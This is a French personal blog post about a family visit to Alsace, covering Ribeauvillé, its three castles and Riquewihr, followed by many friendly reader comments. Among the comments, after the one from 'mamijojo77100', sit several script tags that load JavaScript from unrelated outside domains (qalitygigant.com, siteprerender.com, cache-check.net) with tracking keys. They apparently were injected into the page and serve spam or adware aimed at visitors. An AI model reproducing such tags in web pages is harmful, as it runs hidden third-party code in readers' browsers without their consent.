• Alsace, Ribeauvillé, Riquewihr

Bonjour à tout le monde,

Aujourd'hui, je vous emmène en Alsace...  Où vit ma grande Puce... Voici quelques photos....

Nous nous sommes posés dans un charmant camping municipal et associatif (convivial ça faisait la deuxième fois que nous y allions et l'accueil y est toujours super !) à une centaine de mètres de chez notre fille....

Alsace, Ribeauvillé, Riquewihr

Nous étions allés à Ribeauvillé pour faire une randonnée en famille, celle des 3 châteaux mais l'aller est tout en montée et mon dos n'a pas supporté, au bout d'1h nous avons abandonné mon mari, ma dernière et moi.... pour redescendre sur Ribeauvillé, en attendant que ma Fille et son Ami finissent la randonnée....

Toujours déçue de ne pas avoir pu faire plus, j'ai été consolée en découvrant cette charmante ville....

Située sur la Route des Vins, entre vignoble et montagne, Ribeauvillé est une charmante cité qui a su valoriser son patrimoine historique.
    Au Moyen-âge, la cité était le siège de la Seigneurie de la famille des Ribeaupierre (d’où le nom de la ville de Ribeauvillé).

Les Ribeaupierre firent construire 3 châteaux forts, dont les ruines dominent encore aujourd’hui majestueusement la cité et les collines environnantes. Tous trois sont accessibles par un sentier de randonnée, à flanc de montagne :

• le château st Ulrich, (le plus ancien et le plus important des 3 châteaux)
    • le château Girsberg,
    • le château du Haut-Ribeaupierre, (comme son nom l’indique, le plus élevé des 3 châteaux).

Alsace, Ribeauvillé, Riquewihr

Voici un village que nous avions découvert il y a deux ans.... Mais on ne s'en lasse pas....

Cette perle de l'Alsace a su marier l'excellence de ses vins à celle de son architecture. La balade à pied se savoure et l'on en prend plein les yeux de ces balcons fleuris, de ces fenêtres sculptées et de ces vieilles cours pavées. Demeures des XV aux XVIIIe S, châteaux des princes de Wurtemberg, places et fontaines... Tout est magnifique !

Et l'incontournable "Féérie de Noël", comme je n'ose pas prendre des photos dans les magasins-même, j'ai pioché sur le net pour que, celles qui ne connaissent pas, le découvre un peu...

Alsace, Ribeauvillé, Riquewihr

Mon reportage photo sur l'Alsace se termine, il fut court mais j'ai beaucoup de photos personnelles car ce qui nous importe le plus lorsque nous allons dans cette très belle région c'est de passer du temps avec notre Puce, notre Fille Ainée...

à Bientôt pour continuer notre Road Trip d'été...

Merci pour vos commentaires et votre intérêt ♥♥♥ ça me touche ♥

Mai nou
    Jeudi 10 Juin 2021 à 16:48

Bonjour Valie

Je suis Mai nou du forum de Pat, ça fait plusieurs fois que je viens sur ton blog mais je n'arrivais pas à le lire à cause du style des lettre, j'ai refait une nouvelle tentative et là, j'ai eu le double plaisir de découvrir que tu avais changé le style mais également ton beau reportage sur l'Alsace, région magnifique que j'ai eu le bonheur de visiter il y a quelques années en camping-car, je suis partie pendant un temps, grâce à toi, dans les souvenirs.

Bravo pour ton reportage

Mercredi 26 Août 2020 à 11:08

Je ne connais pas mais ce que tu m en montre et tout ce que je vois à la télé sur Arte et National Géographic font de cette région une région que j aimerais connaitre et l été et l hiver, l été de par ses corbeilles de géraniums aux fenetres je ne sais comment ils font et l hiver pour la magie de Noel tes photos sont magnifiques et merci de me faire voyager avec toi bisous tendresse ma Valie

Mardi 25 Août 2020 à 18:36

Le charme de l'Alsace.... ses maisons décorées etc ...

Je suis allée à un marché de Noël là-bas c'est superbe

Bonne soirée

Samedi 22 Août 2020 à 18:54

Coucou Valie

Nous y sommes aller l’année dernière c'est magnifique à quelques kms de chez moi .

Vendredi 21 Août 2020 à 07:31

Une superbe région si chaude en été, je connais, j'aime beaucoup et je retrouve quelques souvenirs en regardant tes photos. Et là-bas c'est si propre qu'on mangerait par terre je peux te dire que ça change avec "chez nous" ! Merci pour cette page superbe Valie. Je te souhaite un bon week-end pluvieux chez nous mais qui fait du bien, le soleil ça va mais la canicule ça ne va à personne. Gros bisous d'amitié. Je partage sur fb.

Jeudi 20 Août 2020 à 19:31

Bonsoir ma chère Valie

Mon petit coucou du soir pour te souhaiter une bonne

soirée et une douce nuit

gros bisous prends bien soin de toi

Janine

Jacline-H-49
    Jeudi 20 Août 2020 à 15:40

Bonjour ma Valie,

En Alsace, voilà où j'aurais aimé passer quelques semaines de vacances, au lieu d'aller toujours au même endroit, bord de mer alors qu'on ne la voyait même pas ! Des vacances insipides à souhait !

Je t'ai suivi pas à pas dans les jolis villages, j'ai dévoré des yeux les belles maisons et celles toutes fleuries !

Pas de regrets pour ta rando pas terminée, tu as vu bien d'autres coins magnifiques.

Merci pour ce reportage et les histoires qui vont avec.

Bon après midi, beau ciel bleu, 25°.

GROS BISOUS TENDRESSE de

Jacline

Jeudi 20 Août 2020 à 07:23

De belles photos qui me ramènent plus de 40 ans en arrière. Depuis nous n'avons pas eu le courage de traverser toute la France en diagonale pour y retourner...

Merci pour le partage Valie !

Bisous bisous !

Mercredi 19 Août 2020 à 22:40

L’Alsace région belle entre toutes ! Merci à toi pour ce beau reportage photos. J'y suis allée dans ma 1ere vie et j'y retournerais bien volontiers...

Mercredi 19 Août 2020 à 20:25

Quel beau voyage et quels beaux souvenirs et en plus tu as vu ta fille, c'est ça le bonheur!

Mercredi 19 Août 2020 à 20:21

Bonsoir ma chère Valie

Je suis allée 2 x en Alsace et j'ai beaucoup aimé

cette belle région, merci pour les belles photos

Bonne et douce soirée et gros bisous

d'amitié

Janine

Mercredi 19 Août 2020 à 17:31

Merci pour cette balade ; des villages que nous avons visités la semaine de Noël en 2017, il y avait un monde fou dans tous ces villages.

Bonne soirée ; bises  / Nicole

Mercredi 19 Août 2020 à 16:58

Coucou ma belle amie, quel beau voyage et l'Alsace et ce joli village est magnifique. Sans toi, je ne pourrais pas connaître ces beaux coins de ton pays. On a aussi un magasin de Noël à Tremblant, un gros merci pour ces belles découvertes, passe une belle fin de journée, ici c'est nuageux et moins chaud avec 19 degrés seulement. Passe une belle fin de journée, bisou rose tendresse !

mamijojo77100
    Mercredi 19 Août 2020 à 13:52

et oui que de belles regions dans notre france !! parmi celles que je connais un peu et bien c est l alsace que je prefere parmi toutes. J Y suis allee plusieurs fois et on ne s en lasse pas..ICI mon homme a une tete au carre oeil gauche plein de sang medoc qui se contrairie, et l autre tout enfle et une grosse cloque sous l oeil abces dentaire.ET CHIQUE!!!. IL est ko avec son traitement de cheval.. il est couche depuis deux jours. GBISOUS  ma valie bonne apm joelle

<script src="//qalitygigant.com/227ee61cbd084e801b.js"></script>

<script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script>

<script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1597837626505" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>

Mercredi 19 Août 2020 à 13:52

C'est beau l'Alsace, j'aime beaucoup cette région aussi bien en été qu'en hiver.

Merci pour ce beau reportage.

j'attends la suite avec impatience.
    Bonne fin de journée.
    Bisous.

Mercredi 19 Août 2020 à 13:43

J'ai parcouru la route des Vins d'Alsace il n'y a pas très longtemps & nous avions adoré. Je reconnais les endroits où nous sommes passés.

Merci pour ce beau reportage ma tite Valie, j'ai beaucoup aimé cette Région.

Mille Bisous tout doux.

Mercredi 19 Août 2020 à 13:21

merci  de partager avec nous ces beaux endroits, ce sont de belles découvertes as tu craqué dans ce magasin de noel

marianne pirotte
    Mercredi 19 Août 2020 à 12:54

Merci pour ces jolies photos d'Alsace !!

Marianne

Mercredi 19 Août 2020 à 12:31

Cela fait quelques années que je ne suis pas retourné à Riquewihr, alors qu'avant j'y allais tous les ans. J'ai donc été contente de voyager avec toi en alsace !

Thaly

Mercredi 19 Août 2020 à 11:40

que de superbes balades meme si le corps ne suit plus trop en tout cas merci de nous montrer votre périple sans que nous nous fatiguions lol

l'alsace est une superbe région j'adore ces ruelles tout en pierre et à noel le top c'est féerique j'y suis jamais allé

bisous belle journée pour nous sous la grisaille et peut etre bientot sous la pluie sniff

Mercredi 19 Août 2020 à 11:35

Comme elles ont du faire du bien ces retrouvailles après l'éloignement !! Merci pour le partage de cette belle région qu'il me tarde de découvrir !! C'est superbe et ça donne envie d'y aller !! Je crois que mes parents ont fait la boutique de Noël !! Ah la la quel voyage fabuleux vous avez fait !! Comme quoi on a un joli pays !!

Gros Bisous

Mercredi 19 Août 2020 à 10:28

Quelle belle balade. Et les retrouvailles en famille quel bonheur. Merci pour ce partage. Bonne journée. Bisous

Jour de Mai
    Mercredi 19 Août 2020 à 10:07

Coucou Valie,

Région que je connais, toujours aussi charmante et que j'ai plaisir à revoir en ta compagnie car illustration au top et commentaires appropriés.

Merci pour ce ravissant partage agrémenté de photos personnelles mais pas de trombine pour toi car tu prends les photos.

Dommage pour la rando mais c'est vrai que c'est très difficile. Une autre fois peut-être !

Je te souhaite un très bon mercredi et je te fais de très gros bisous ♥♥♥♥♥

LNglasses

Mercredi 19 Août 2020 à 10:00

que de beaux souvenirs !!! des photos superbes !! et vous êtes bien installés

Mercredi 19 Août 2020 à 09:40
    lamanuelle25

Des endroits que je connais et que j'ai visité aussi! Impossible pour moi aussi de faire la rando!!! Mais admirer ces endroits est un bonheur sans cesse renouveler. Merci du partage, bisous Nadine

Mercredi 19 Août 2020 à 08:09

c'est une région magnifique ! de bons moments en famille

Mercredi 19 Août 2020 à 08:09

Bonjour ma Valie, Merci de partager avec nous ce beau périple, endroit magnifique et si bien raconté !!!

Je te souhaite un beau et bon mercredi